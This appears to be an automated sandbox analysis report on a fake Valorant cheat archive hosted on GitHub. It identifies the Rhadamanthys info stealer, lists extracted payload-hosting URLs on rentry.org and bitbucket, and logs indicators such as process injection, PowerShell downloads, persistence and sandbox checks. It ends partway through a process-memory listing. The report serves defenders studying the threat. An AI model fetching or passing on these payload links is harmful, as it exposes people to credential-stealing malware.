Analysis
-
max time kernel
108s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-06-2024 18:08
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/SISNEST/Valorant/blob/main/ZWHAX.7z
Resource
win10v2004-20240508-en
General
-
Target
https://github.com/SISNEST/Valorant/blob/main/ZWHAX.7z
Malware Config
Extracted
https://rentry.org/pancek61111111111111/raw
Extracted
https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/pan.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
tnnmcduu.ffx1.exedescription pid process target process PID 1912 created 2684 1912 tnnmcduu.ffx1.exe sihost.exe -
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exeflow pid process 72 4328 powershell.exe 74 4328 powershell.exe 78 1036 powershell.exe 79 5352 powershell.exe 81 5652 powershell.exe 82 5652 powershell.exe 83 2592 powershell.exe 94 5848 msiexec.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1036 powershell.exe 2592 powershell.exe 6552 powershell.exe 1008 powershell.exe 2892 powershell.exe 4328 powershell.exe 5352 powershell.exe 5652 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ZWHax.exenfy5hudn.bqf0.exenfy5hudn.bqf3.exeZWHax.exetnnmcduu.ffx0.exetnnmcduu.ffx3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation ZWHax.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation nfy5hudn.bqf0.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation nfy5hudn.bqf3.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation ZWHax.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation tnnmcduu.ffx0.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation tnnmcduu.ffx3.exe -
Executes dropped EXE 10 IoCs
Processes:
ZWHax.exetnnmcduu.ffx0.exetnnmcduu.ffx1.exetnnmcduu.ffx2.exetnnmcduu.ffx3.exeZWHax.exenfy5hudn.bqf0.exenfy5hudn.bqf1.exenfy5hudn.bqf2.exenfy5hudn.bqf3.exepid process 3136 ZWHax.exe 3540 tnnmcduu.ffx0.exe 1912 tnnmcduu.ffx1.exe 4416 tnnmcduu.ffx2.exe 460 tnnmcduu.ffx3.exe 5584 ZWHax.exe 6036 nfy5hudn.bqf0.exe 6084 nfy5hudn.bqf1.exe 5124 nfy5hudn.bqf2.exe 5200 nfy5hudn.bqf3.exe -
Loads dropped DLL 4 IoCs
Processes:
MsiExec.exepid process 6900 MsiExec.exe 6900 MsiExec.exe 6900 MsiExec.exe 6900 MsiExec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 45 raw.githubusercontent.com 73 bitbucket.org 74 bitbucket.org 79 bitbucket.org 82 bitbucket.org 44 raw.githubusercontent.com -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 6140 powercfg.exe 1192 powercfg.exe 5608 powercfg.exe 5172 powercfg.exe -
Drops file in System32 directory 7 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exetnnmcduu.ffx2.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\RunNodeScriptAtLogon svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\MRT.exe tnnmcduu.ffx2.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
tnnmcduu.ffx2.exedescription pid process target process PID 4416 set thread context of 5228 4416 tnnmcduu.ffx2.exe dialer.exe -
Drops file in Program Files directory 10 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\nodejs\corepack msiexec.exe File created C:\Program Files\nodejs\install_tools.bat msiexec.exe File created C:\Program Files\nodejs\node.exe msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\CHANGELOG.md msiexec.exe File created C:\Program Files\nodejs\corepack.cmd msiexec.exe File created C:\Program Files\nodejs\nodevars.bat msiexec.exe File created C:\Program Files\nodejs\npm msiexec.exe File created C:\Program Files\nodejs\npm.cmd msiexec.exe File created C:\Program Files\nodejs\npx msiexec.exe File created C:\Program Files\nodejs\npx.cmd msiexec.exe -
Drops file in Windows directory 12 IoCs
Processes:
msiexec.exesvchost.exedescription ioc process File created C:\Windows\Installer\e58d6a4.msi msiexec.exe File opened for modification C:\Windows\Installer\e58d6a4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID906.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID956.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSID935.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} msiexec.exe File opened for modification C:\Windows\Installer\MSIE4C1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEEB4.tmp msiexec.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5360 sc.exe 5224 sc.exe 5824 sc.exe 5272 sc.exe 5932 sc.exe 60 sc.exe 5860 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe -
Delays execution with timeout.exe 64 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 5232 timeout.exe 7084 timeout.exe 5784 timeout.exe 1384 timeout.exe 7052 timeout.exe 5112 timeout.exe 6424 timeout.exe 5576 timeout.exe 6548 timeout.exe 6976 timeout.exe 6208 timeout.exe 5968 timeout.exe 2520 timeout.exe 5600 timeout.exe 6516 timeout.exe 3000 timeout.exe 6292 timeout.exe 6336 timeout.exe 7020 timeout.exe 6668 timeout.exe 2528 timeout.exe 5932 timeout.exe 5720 timeout.exe 6412 timeout.exe 1484 timeout.exe 3916 timeout.exe 964 timeout.exe 6996 timeout.exe 3264 timeout.exe 3448 timeout.exe 2988 timeout.exe 1008 timeout.exe 6164 timeout.exe 5884 timeout.exe 6464 timeout.exe 3632 timeout.exe 5108 timeout.exe 228 timeout.exe 6768 timeout.exe 6800 timeout.exe 1044 timeout.exe 7068 timeout.exe 5560 timeout.exe 6588 timeout.exe 5328 timeout.exe 6928 timeout.exe 6220 timeout.exe 3512 timeout.exe 5500 timeout.exe 3512 timeout.exe 6872 timeout.exe 6232 timeout.exe 6840 timeout.exe 6944 timeout.exe 5248 timeout.exe 5360 timeout.exe 5624 timeout.exe 7056 timeout.exe 6520 timeout.exe 6176 timeout.exe 4344 timeout.exe 6840 timeout.exe 6100 timeout.exe 1064 timeout.exe -
Enumerates processes with tasklist 1 TTPs 16 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 5604 tasklist.exe 2324 tasklist.exe 6084 tasklist.exe 5876 tasklist.exe 5424 tasklist.exe 5796 tasklist.exe 5156 tasklist.exe 5824 tasklist.exe 6136 tasklist.exe 6136 tasklist.exe 5592 tasklist.exe 5676 tasklist.exe 5716 tasklist.exe 5560 tasklist.exe 5816 tasklist.exe 5544 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5376 taskkill.exe 5472 taskkill.exe 6116 taskkill.exe 5380 taskkill.exe 5860 taskkill.exe 5608 taskkill.exe 6072 taskkill.exe 5968 taskkill.exe 5620 taskkill.exe 6080 taskkill.exe 2392 taskkill.exe 5408 taskkill.exe 4276 taskkill.exe 5748 taskkill.exe 6068 taskkill.exe 5692 taskkill.exe -
Modifies data under HKEY_USERS 14 IoCs
Processes:
OfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={409365A8-F26E-4F8E-9DAD-5F806531037C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 23 Jun 2024 18:10:15 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1719166215" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe -
Modifies registry class 3 IoCs
Processes:
msedge.exeOpenWith.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings OpenWith.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5272 schtasks.exe 2492 schtasks.exe 6932 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exetnnmcduu.ffx1.exeopenwith.exepowershell.exepowershell.exepowershell.exetaskmgr.exetnnmcduu.ffx2.exepowershell.exepid process 1860 msedge.exe 1860 msedge.exe 2724 msedge.exe 2724 msedge.exe 3048 identity_helper.exe 3048 identity_helper.exe 4328 msedge.exe 4328 msedge.exe 4328 powershell.exe 4328 powershell.exe 4328 powershell.exe 4168 powershell.exe 4168 powershell.exe 4168 powershell.exe 1036 powershell.exe 1036 powershell.exe 1036 powershell.exe 5352 powershell.exe 5352 powershell.exe 5352 powershell.exe 1912 tnnmcduu.ffx1.exe 1912 tnnmcduu.ffx1.exe 5500 openwith.exe 5500 openwith.exe 5500 openwith.exe 5500 openwith.exe 5652 powershell.exe 5652 powershell.exe 5652 powershell.exe 5808 powershell.exe 5808 powershell.exe 5808 powershell.exe 2592 powershell.exe 2592 powershell.exe 2592 powershell.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 4416 tnnmcduu.ffx2.exe 2892 powershell.exe 2892 powershell.exe 2892 powershell.exe 5680 taskmgr.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe 4416 tnnmcduu.ffx2.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
OpenWith.exetaskmgr.exepid process 2016 OpenWith.exe 5680 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskmgr.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetasklist.exetaskkill.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exeWMIC.exedescription pid process Token: SeRestorePrivilege 3080 7zG.exe Token: 35 3080 7zG.exe Token: SeSecurityPrivilege 3080 7zG.exe Token: SeSecurityPrivilege 3080 7zG.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 5352 powershell.exe Token: SeDebugPrivilege 5652 powershell.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 5604 tasklist.exe Token: SeDebugPrivilege 6080 taskkill.exe Token: SeDebugPrivilege 5156 tasklist.exe Token: SeDebugPrivilege 5692 taskkill.exe Token: SeDebugPrivilege 5716 tasklist.exe Token: SeDebugPrivilege 5680 taskmgr.exe Token: SeSystemProfilePrivilege 5680 taskmgr.exe Token: SeCreateGlobalPrivilege 5680 taskmgr.exe Token: SeDebugPrivilege 5408 taskkill.exe Token: SeDebugPrivilege 5560 tasklist.exe Token: SeDebugPrivilege 5608 taskkill.exe Token: SeDebugPrivilege 5816 tasklist.exe Token: SeDebugPrivilege 4276 taskkill.exe Token: SeDebugPrivilege 5824 tasklist.exe Token: SeDebugPrivilege 5748 taskkill.exe Token: SeDebugPrivilege 6136 tasklist.exe Token: SeDebugPrivilege 6072 taskkill.exe Token: SeDebugPrivilege 5544 tasklist.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 2324 tasklist.exe Token: SeDebugPrivilege 6084 tasklist.exe Token: SeDebugPrivilege 5968 taskkill.exe Token: SeDebugPrivilege 5620 taskkill.exe Token: SeDebugPrivilege 5876 tasklist.exe Token: SeDebugPrivilege 6068 taskkill.exe Token: SeDebugPrivilege 6136 tasklist.exe Token: SeDebugPrivilege 5860 taskkill.exe Token: SeDebugPrivilege 5592 tasklist.exe Token: SeDebugPrivilege 5376 taskkill.exe Token: SeDebugPrivilege 5424 tasklist.exe Token: SeDebugPrivilege 5472 taskkill.exe Token: SeDebugPrivilege 5676 tasklist.exe Token: SeIncreaseQuotaPrivilege 5540 WMIC.exe Token: SeSecurityPrivilege 5540 WMIC.exe Token: SeTakeOwnershipPrivilege 5540 WMIC.exe Token: SeLoadDriverPrivilege 5540 WMIC.exe Token: SeSystemProfilePrivilege 5540 WMIC.exe Token: SeSystemtimePrivilege 5540 WMIC.exe Token: SeProfSingleProcessPrivilege 5540 WMIC.exe Token: SeIncBasePriorityPrivilege 5540 WMIC.exe Token: SeCreatePagefilePrivilege 5540 WMIC.exe Token: SeBackupPrivilege 5540 WMIC.exe Token: SeRestorePrivilege 5540 WMIC.exe Token: SeShutdownPrivilege 5540 WMIC.exe Token: SeDebugPrivilege 5540 WMIC.exe Token: SeSystemEnvironmentPrivilege 5540 WMIC.exe Token: SeRemoteShutdownPrivilege 5540 WMIC.exe Token: SeUndockPrivilege 5540 WMIC.exe Token: SeManageVolumePrivilege 5540 WMIC.exe Token: 33 5540 WMIC.exe Token: 34 5540 WMIC.exe Token: 35 5540 WMIC.exe Token: 36 5540 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exe7zG.exepowershell.exetaskmgr.exepid process 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 3080 7zG.exe 4168 powershell.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exetaskmgr.exepid process 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 2724 msedge.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe 5680 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
OpenWith.exeOpenWith.exepid process 2808 OpenWith.exe 2016 OpenWith.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exeRuntimeBroker.exepid process 4092 RuntimeBroker.exe 2488 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2724 wrote to memory of 3496 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 3496 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1388 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1860 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 1860 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe 